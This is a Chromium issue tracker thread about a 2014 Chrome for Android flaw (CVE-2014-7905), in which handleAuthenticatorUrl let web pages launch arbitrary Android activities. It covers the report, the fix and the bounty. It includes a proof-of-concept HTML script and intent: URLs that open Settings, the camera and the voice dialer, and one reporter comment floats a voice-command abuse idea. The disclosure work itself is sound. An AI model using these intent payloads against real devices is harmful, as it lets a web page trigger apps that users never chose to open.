New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user
Status: Fixed
Owner:
Last visit > 30 days ago
Closed: Oct 2014
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Android
Pri: 1
Type: Bug-Security



Sign in to add a comment
Security: handleAuthenticatorUrl to launch any activity from web page
Reported by win...@gmail.com, Oct 9 2014 Back to list
VULNERABILITY DETAILS
handleAuthenticatorUrl in com.google.android.apps.chrome.tab.AuthenticatorHelper
can launch unintended activity (those without BROWSABLE category) on phone.

VERSION
Chrome Version: Chrome for Android 37.0.2062.117
Operating System: Android 4.4.2

REPRODUCTION CASE

open the following html in chrome will start Settings applications in Android

<body>
<script>
var url = "intent:#Intent;action=com.google.android.apps.authenticator.AUTHENTICATE;SEL;component=com.android.settings/.Settings;end";
location.href = url;
</script>
</body>

another example url to launch camera application:
var url = "intent:#Intent;action=com.google.android.apps.authenticator.AUTHENTICATE;SEL;component=com.android.camera2/com.android.camera.CameraActivity;end";


 
Cc: mkosiba@chromium.org benm@chromium.org candr...@chromium.org palmer@chromium.org
Labels: OS-Android Security_Severity-High Security_Impact-Stable Cr-Mobile-Intents
Status: Available
Thanks for the report.

Adding some ccs from bug 370399. Does anyone know who a good owner for this might be?
Cc: jaekyun@chromium.org
+CC jaekyun@ who's currently working in that area. Jaekyun, you want to take this on?
FTR: since the code in handleAuthenticatorUrl looks like it's copy-pasted from UrlHandler it should be easy to port the fixes from 370399.
Project Member Comment 4 by clusterf...@chromium.org, Oct 9 2014
Labels: M-38 Pri-1
Owner: jaekyun@chromium.org
I will take a look at this issue.
I've uploaded https://chrome-internal-review.googlesource.com/#/c/179039 to fix this issue.

Project Member Comment 7 by bugdroid1@chromium.org, Oct 10 2014
The following change refers to this bug:
https://chrome-internal-review.googlesource.com/179039
Labels: Merge-Requested
Status: Started
Labels: -Merge-Requested
My change is reverted because it caused lint error.

So I've uploaded https://chrome-internal-review.googlesource.com/#/c/179246/ after fixing the lint error.

Labels: Merge-Requested
The change is landed successfully.
BTW, isn't M38 already released? Maybe we only need to merge the patch into M39 because this isn't any regression.
Labels: -M-38 M-39
38 has been released, per comment 11, punting to 39. 
Labels: -Merge-Requested Merge-Approved
merge approved for m39 branch 2171
Cc: kkimlabs@chromium.org
Labels: -Merge-Approved Merge-Merged
Status: Fixed
https://chrome-internal-review.googlesource.com/#/c/179331/ is just merged to m39.
Project Member Comment 16 by clusterf...@chromium.org, Oct 14 2014
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Comment 17 by win...@gmail.com, Oct 16 2014
Note that explicit intent can also be used here (instead of using selector) to bypass security check.
An interesting exploit would be to start a voice dialer while playing a voice command with Web Audio API.

var url = "intent:#Intent;action=com.google.android.apps.authenticator.AUTHENTICATE;component=com.android.voicedialer/.VoiceDialerActivity;end";

see attachment.

test3.html
2.0 KB View Download
My patch covers that explicit intent as well because it resets component information of both an intent and a selector in an intent.

Labels: Release-0-M39
Labels: reward-topanel
Comment 21 by win...@gmail.com, Nov 13 2014
Chrome 39 for android is out, when will this issue get a CVE identifier?
What is a CVE identifier?
Comment 23 by win...@gmail.com, Nov 13 2014
please see https://cve.mitre.org/cve/identifiers/
for example, in the following release notes, a CVE identifier (CVE-2014-3201) is assigned:
http://googlechromereleases.blogspot.com/2014/10/chrome-for-android-update.html
Grace, whom should I contact in Chrome team to get a CVE identifier for this issue?

When Chrome 39 is released, I'll update this with the CVE.
Labels: -reward-topanel reward-unpaid reward-2000 CVE-2014-7905
Thanks for the report! This one qualified for a $2000 reward.
Comment 27 by win...@gmail.com, Nov 17 2014
Thanks a lot, you are so kind! if possible, please credit me as "WangTao(neobyte) of Baidu X-Team". 
Labels: -reward-unpaid reward-inprogress
Reward payment in progress.
Labels: -reward-inprogress reward-inprocess
Project Member Comment 30 by clusterf...@chromium.org, Jan 19 2015
Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Cc: -kkimlabs@chromium.org
Project Member Comment 32 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 33 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment